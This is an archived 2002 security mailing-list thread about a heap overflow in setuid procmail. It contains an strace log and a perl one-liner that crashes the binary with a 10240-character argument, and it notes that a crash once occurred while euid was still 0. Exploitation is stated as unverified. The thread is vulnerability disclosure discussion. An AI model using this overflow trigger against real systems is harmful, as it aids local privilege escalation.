Vulnerability Development mailing list archives
Re: procmail heap overflow
From: KF <dotslash () snosoft com>
Date: Wed, 19 Jun 2002 00:46:29 -0400
I believe we (one of our researchers "dvdman") were messing with this a few months back ... we never finished up out research ... heres what I found in an old strace log...
-KF malloc(86) = 0x0805e0c0 memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096) = 0x0805e0c4 strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a" setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0 setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0 setuid(506) = 0 setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8 malloc(81) = 0x0805e120 memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120 strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0) = 2 memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128 strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0) = 17 memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a write(2, "procmail: Exceeded LINEBUF\n", 27) = 27 strchr("PROCMAIL_OVERFLOW=yes", '=') = "=yes"strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...>
--- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ -KF SpaceWalker wrote:
$ procmail -v procmail v3.15.1 2001/01/08 $ procmail `perl -e '{print "A"x10240}'`=A wait indefinitively Doesn't seem to segfault on my system, I'm running base slackware 8 on x86. On Wed, 19 Jun 2002 02:38:08 +0200 flatline <flatline () blackhat nl> wrote:hi, i found a heap overflow in procmail (up until latest) some time ago. flatline@intra:/usr/bin$ ls -la procmail -rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail* flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A procmail: Exceeded LINEBUF Segmentation fault flatline@intra:/usr/bin$at first it seemed to properly drop privs before segging, but not too long ago i managed to make it crash while it still had euid 0. segfaults have been seen on red hat/slackware linux and bsd variants. successful exploitation has not been verified./ flatlinegreets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
Current thread:
- procmail heap overflow flatline (Jun 19)
- Re: procmail heap overflow Ryan W. Maple (Jun 19)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 19)
- RE: procmail heap overflow Christopher Meiklejohn (Jun 19)
- Re: procmail heap overflow kam (Jun 19)
- Re: procmail heap overflow SpaceWalker (Jun 19)
- Re: procmail heap overflow KF (Jun 19)
- <Possible follow-ups>
- RE: procmail heap overflow Peter Mueller (Jun 19)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 21)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- RE: procmail heap overflow Wodahs Latigid (Jun 20)
- Re: procmail heap overflow Skot (Jun 20)
- RE: procmail heap overflow Peter Mueller (Jun 20)